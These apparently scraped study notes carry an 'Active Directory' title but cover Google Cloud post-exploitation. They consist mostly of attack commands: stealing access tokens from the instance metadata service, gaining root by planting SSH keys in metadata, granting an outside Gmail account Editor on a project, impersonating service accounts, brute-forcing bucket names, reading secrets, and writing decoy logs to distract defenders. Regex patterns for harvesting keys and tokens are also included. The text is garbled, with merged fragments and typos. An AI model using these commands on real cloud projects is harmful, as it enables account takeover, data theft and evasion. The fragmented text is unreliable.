Active Directory Pentesting Notes
Active Directory notes I made while going through TryHackMe material and doing some additional research.
gcloud
command can be found by appending --log-http
to the commandRecursively enumerate an instance’s metadata:
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
Organization
--> Folders
--> Projects
--> Resources
Default service accounts look like the following:
PROJECT_NUMBER-compute@developer.gserviceaccount.com
PROJECT_ID@appspot.gserviceaccount.com
Custom service accounts look like the following:
SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
169.254.169.254
IP such as in the example below:$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \
-H 'Metadata-Flavor:Google'
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append
devstorage.read_only
default scope allows read access to all storage buckets within the specified projectcloud-platform
is specified for an instance, the service account can attempt to authenticate to all API endpoints Primitive roles
Owner
, Editor
, and Viewer
Editor
role (insecure!!)Predefined roles
compute.instanceAdmin
) Custom roles
To see roles assigned to each member of a project:
gcloud projects get-iam-policy <PROJECT_ID>
Command | Description |
gcloud organizations list | Get organization ID |
gcloud organizations get-iam-policy | View user permissions within organization |
Token can be retrieved from metadata service:
Request
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
Response
{
"access_token":"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA",
"expires_in":3599,
"token_type":"Bearer"
}
The following are the steps taken to search for credentials when using the GCP client libraries:
GOOGLE_APPLICATION_CREDENTIALS
environment variable is checked⭐ Always make sure to check if the principle of least-privilege is being applied throughout the environment
The privesc techniques described below are written from the perspective of internal access to a compromised instance. However, they can also be performed if you find SSRF in some cases.
If the client has a /v1beta
enabled, you can get the access token without the special header:
curl http://metadata.google.internal/computeMetadata/v1beta/instance/service-accounts/default/token
Otherwise, you must query http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
with a custom header set
gsutil ls
returns no storage buckets, you may still be able to query a storage bucket by specifying the name of the bucket for example gsutil ls gs://storage_bucket_example-1234567
Enumerate scripts within the following areas:
Default Service Account
The following access scopes are offered for default service accounts:
Custom Service Account
One of the following privileges necessary for privesc:
compute.instances.setMetadata
compute.projects.setCommonInstanceMetadata
It is necessary to be able to authenticate to either https://www.googleapis.com/auth/compute
or https://www.googleapis.com/auth/cloud-platform
Adding SSH Key to Metadata
sudo
rights Block project-wide SSH keys
option enabledAdding SSH Key to Existing Privileged User
gcluod compute instance describe <INSTANCE> --zone <ZONE>
This returns something like the following:
[...]
- key: ssh-keys
value: |-
high-priv-user:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ high-priv-user
low-priv-user:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbk[...]
high-priv-user
ssh-keygen -t rsa -C "high-priv-user" -f ./key -P ""
high-priv-user
public key filegcloud compute instances add-metadata <INSTANCE> --metadata-from-file ssh-keys=ssh_public_file.txt
Creating New User with SSH Key
sudo
permissions
Sudo to Existing Session
Use the following command to generate a new SSH key, add your current username to google-sudoers
group, and initiate an SSH session:
gcloud compute ssh <INSTANCE_NAME>
OS Login
enable-oslogin = TRUE
enable-oslogin-2fa = TRUE
roles/compute.osLogin
and roles/compute.osAdminLogin
control SSH access to instances with enabled OS Login
Block pojrect-wide SSH keys
option enabled:gcloud compute project-info add-metadata --metadata-from-file ssh-keys=my_public_ssh-key.txt
Access scopes are not a security mechanism (stated by Google themselves)
Find Token Access Scopes
TOKEN='gcloud auth print-access-token'
curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
gcloud auth activate-service-account --key-file <FILE>
Check for Service Accounts with Exported Key Files
for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
echo Looking for keys for $i:
gcloud iam service-accounts keys list --iam-account $i
done
<PROJECT_ID>-<PORTION_OF_KEY_ID>.json
gcloud compute instances list --quiet
PROJECT_NUMBER-compute@developer.gserviceaccount.com
)
~/.config/gcloud/credentials.db
~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json
~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto
~/.credentials.json
Three ways to impersonate a service account:
iam.serviceAccountTokenCreator
permissionOwner
access, you can try logging into the web interfaceEditor
access to any arbitrary @gmail.com
account and then login (can’t provide Owner
access)gcloud projects add-iam-policy-binding <PROJECT> --member user:0xd4y@gmail.com --role roles/editor
--impersonate-service-account
flag to execute a command using the specified service account:gcloud compute instances list --impersonate-service-account <SERVICE_ACCOUNT>
gcloud
commands are made specifically for exporting dataFinding databases across project
Cloud SQL
=============
gcloud sql instances list
gcloud sql databases list --instance [INSTANCE]
Cloud Spanner
==============
gcloud spanner instances list
gcloud spanner databases list --instance [INSTANCE]
Cloud Bigtable
==============
gcloud bigtable instances list
gsutil
to interact with storage bucketsgsutil ls
returns access denied, access to storage buckets is still potentially possible, but requires the bucket name to be specified
Bash Oneliner for Bruteforcing Bucket Names
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
Command | Description |
gcloud kms keyrings list --location global | Lists global keyrings available |
gcloud kms keys list --keyring <KEYRING_NAME> --location global | Lists keys inside a keyring |
gcloud kms decrypt --ciphertext-file=<INFILE> --plaintext-file=<OUTFILE> --key <KEY> --keyring <KEYRING> --location global | Decrypts file using a key |
Two ways to view the log files from the serial ports:
Compute: Read Only
access scope restrictiongcloud compute instances get-serial-port-output <INSTANCE_NAME> --port <PORT> --start start --zone <ZONE>
Find List of Custom Images
gcloud compute images list --no-standard-images
Export Images
gcloud compute images export --image <IMAGE_NAME> --export-format qcow2 --destination-uri <BUCKET>
Command | Description |
gcloud compute instance-templates list | Lists available templates |
gcloud compute instance-templates describe <TEMPLATE_NAME> | Get details of specific template |
write
access to write to log files, however if read
permissions are also granted, then logs can be readCommand | Description |
gcloud logging logs list | Lists log folders in current project |
gcloud logging read <LOG_FOLDER> | Read contents of specific log folder |
gcloud logging write <LOG_FOLDER> <MESSAGE> | Write arbitrary data to a specific log folder. Can be used for distraction. |
Command | Description |
gcloud functions list | Lists available cloud functions |
gcloud functions describe <FUNCTION_NAME> | Display function configuration and defined environment variables |
gcloud functions logs read <FUNCTION_NAME> | Get logs of the function executions |
Command | Description |
gcloud app versions list | Lists existing versions for all services in the App Engine server |
gcloud app describe <APP> | Displays information about a specific app |
Command | Description |
gcloud run services list --platform=managed --format=json
gcloud run services list --platform=gke --format=json | Lists services across available platforms |
1. curl <URL>
2. curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" <URL> | 1. Attempt to trigger a job as an unauthenticated user 2. Trigger a job as authenticated user |
Command | Description |
gcloud ai-platforms models list --format=json | Lists models |
gcloud ai-platform jobs list --format=json | Lists jobs |
Pub/Sub is made up of the following:
Command | Description |
gcloud pubsub topics list | Lists topics in project |
gcloud pubsub subscrpitions list --format=json | Lists subscriptions for all topics |
gcloud pubsub subscriptions pull <SUBSCRIPTION_NAME> | Pulls one or more messages from a subscriptions |
Command | Description |
gcloud source repos list | Enumerate available repos |
gcloud source repos clone <REPO_NAME> | Clone a repo |
List Filestore Instances
gcloud filestore instances list --format=json
Command | Description |
gcloud container clusters list | List container clusters in current project |
gcloud container clusters get-credentials <CLUSTER_NAME> --region <REGION> | Authenticates your ~/..kube/config file to include the cluster so that you can use kubectl . |
kubectl cluster-info | Get information about the cluster. |
Kubectl cheat sheet: https://kubernetes.io/docs/reference/kubectl/cheatsheet/
Command | Description |
gcloud secrets list | Lists secrets in vault |
gcloud secrets describe <SECRET> | Get the value of the secret. |
TARGET_DIR="/path/to/whatever"
# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
"$TARGET_DIR"
# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
"$TARGET_DIR"
# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
"$TARGET_DIR"
# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
"$TARGET_DIR"
# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
"$TARGET_DIR"
# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
"$TARGET_DIR"
# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
"$TARGET_DIR"
default-allow-internal
- allows all traffic from other instances on the same networkdefault-allow-ssh
- allows port 22 traffic from everywheredefault-allow-rdp
- allows port 3389 traffic from everywheredefault-allow-icmp
- allows ping from everywhereView all subnets in current project:
gcloud compute networks subnets list
View all internal/external IP addresses in project:
gcloud compute instances list
View open ports of all instances